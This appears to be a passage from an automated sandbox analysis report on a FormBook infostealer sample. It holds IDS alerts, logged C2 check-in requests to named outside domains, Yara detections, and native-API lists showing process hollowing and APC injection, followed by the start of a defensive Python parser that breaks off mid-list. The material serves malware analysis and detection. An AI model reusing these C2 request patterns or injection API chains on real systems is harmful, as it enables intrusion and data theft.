Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.extinctionbrews.com/dy8g/
Source: global traffic | HTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1 | Host: www.invisiongc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1 | Host: www.killrstudio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1 | Host: www.ivoirepneus.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1 | Host: www.extinctionbrews.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1 | Host: www.cindywillardrealtor.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1 | Host: www.doityourselfism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1 | Host: www.builtbydawn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1 | Host: www.qq66520.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1 | Host: www.mzyxi-rkah-y.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1 | Host: www.thenorthgoldline.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1 | Host: www.guys-only.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
Source: global traffic | HTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1 | Host: www.wideawakemomma.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (no printable ASCII)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 213.186.33.5
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS
Source: unknown | DNS traffic detected: queries for: www.invisiongc.net
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: PQMW0W5h3X.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PQMW0W5h3X.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: PQMW0W5h3X.exe, 00000000.00000002.334621545.000000000073A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49560 NtWriteFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C18280 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C183B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C18300 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C181D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C18222 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C183AA NtAllocateVirtualMemory,
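          The native-API rows above are the raw evidence behind the "Sample uses process hollowing technique", "Queues an APC in another process" and "Modifies the context of a thread in another process" verdicts in the overview: NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread in one process is the hollowing primitive set, and NtOpenThread plus NtQueueApcThread is the APC path. The script below is an added example written for this page, not code from Joe Sandbox or from the report: it parses rows in the form shown above (both the "Source: ... | Code function: ..." layout and the fused "...exeCode function:" layout), groups the API names by analysed-process index, and reports which injection primitive sets are complete per process. The technique-to-API groupings are the editor's own analyst heuristic, the sample rows are a constructed subset copied from the report, and the reading of the "2_2_" prefix as process-index_phase_ is an assumption.

```python
import re
from collections import defaultdict

# One "Code function:" row of a Joe Sandbox report:
#   Source: <image> | Code function: <proc>_<phase>_<address> <api>,<api>,...
# The separator between the two columns is optional so that rows whose
# columns were fused by extraction ("...exeCode function:") still parse.
ROW_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]+)\s*(?P<apis>.*)$"
)

# Native-API sets that together form an injection primitive. These
# groupings are the editor's heuristic, not something the report states;
# a technique fires only when every API in its set was seen in one process.
TECHNIQUES = {
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection",
                          "NtWriteVirtualMemory", "NtSetContextThread",
                          "NtResumeThread"},
    "APC injection": {"NtOpenProcess", "NtOpenThread",
                      "NtWriteVirtualMemory", "NtQueueApcThread"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread",
                              "NtSetContextThread", "NtResumeThread"},
}

# Constructed subset of the rows in this report (one row deliberately left
# in the fused layout). The rundll32 subset here covers only the APC path.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A499D0 NtCreateProcessEx,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A498A0 NtWriteVirtualMemory,",
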